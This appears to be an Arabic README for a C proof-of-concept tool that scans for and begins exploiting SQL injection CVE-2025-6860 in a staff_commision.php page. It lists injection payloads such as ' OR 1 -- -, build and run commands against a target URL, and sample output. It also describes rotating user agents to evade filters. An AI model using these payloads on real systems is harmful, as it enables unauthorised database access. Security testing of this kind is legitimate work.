
أداة سطر أوامر لإثبات المفهوم بلغة C لاكتشاف ثغرة حقن SQL.
أداة سطر أوامر إثبات المفهوم بلغة C للكشف (والاستغلال المبدئي) لثغرة حقن SQL CVE‑2025‑6860 في ملف staff_commision.php (المعاملات fromdate و todate). تستخدم libcurl لطلبات HTTP، وتدور عبر الحمولات ووكلاء المستخدم الشائعين، وتفحص الردود بحثًا عن أنماط أخطاء SQL، وتصدر مخرجات طرفية ملونة تعتمد على استدعاءات النظام.
تدوير الحمولات تلقائيًا
تجرب مجموعة متنوعة من حمولات حقن SQL (' OR 1 -- -, admin' or '1'='1, -1 UNION SELECT 1, …) ضد كل من fromdate و todate.
تدوير ديناميكي لسلسلة وكيل المستخدم
تدور عبر قائمة من سلاسل وكلاء مستخدم متصفح واقعية لتجنب المرشحات البسيطة.
HTTP مدعوم بـ Libcurl
يتابع عمليات إعادة التوجيه، ويعطل التحقق من SSL (للاختبار)، ويدرج رؤوسًا مخصصة.
استدعاءات نظام منخفضة المستوى للإدخال/الإخراج
يستخدم syscall(write) بدلاً من printf() للرسائل الملونة والموقوتة.
تحليل الاستجابة
يفحص ردود الخادم بحثًا عن أكثر من 50 توقيع خطأ SQL (MySQL, PostgreSQL, Oracle, MSSQL, OLE‑DB, ODBC, Hibernate، إلخ.).
مخرجات ملونة بـ ANSI
رسائل واضحة للنجاح / الفشل / المعلومات باللون الأخضر والأزرق والأحمر.
على Debian/Ubuntu: sudo apt update sudo apt install -y build-essential libcurl4-openssl-dev
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u "http://target.com/panel/staff_commision.php?fromdate=&todate=" -u, --url قالب عنوان URL الهدف، يتضمن المسار الأساسي والمعاملات الفارغة.
مثال: ./exploit -u "http://vulnweb.com/panel/staff_commision.php?fromdate=&todate=" إذا كانت قابلة للاختراق، سترى:
[+] Exploitation of CVE-2025-6860 has begun... [+] TARGET URL : http://…?fromdate=&todate= [+] Request sent successfully! [+] FULL URL : http://…?fromdate=' OR 1 -- -&todate=' OR 1 -- - [+] HTTP CODE : 200 [+] A suspicious word was found in response! [+] Keyword : You have an error in your SQL syntax [+] The server suffers from a CVE-2025-6860 vulnerability! عند الفشل، يبلغ عن الأنماط المفقودة أو أخطاء HTTP.
📂 هيكل الملفات: ├── exploit.c # منطق الاستغلال الرئيسي ├── argparse.c # تطبيق أدنى لـ argparse ├── argparse.h # ملف الرأس لـ argparse.c ├── README.md # هذه الوثائق └── LICENSE # ملف ترخيص MIT 📝 المساهمة: قم بعمل fork للمستودع
أضف حمولات / أنماط أخطاء / ميزات استخراج متقدمة
إخلاء مسؤولية: استخدم هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها. الفحص أو الاستغلال غير المصرح به غير قانوني.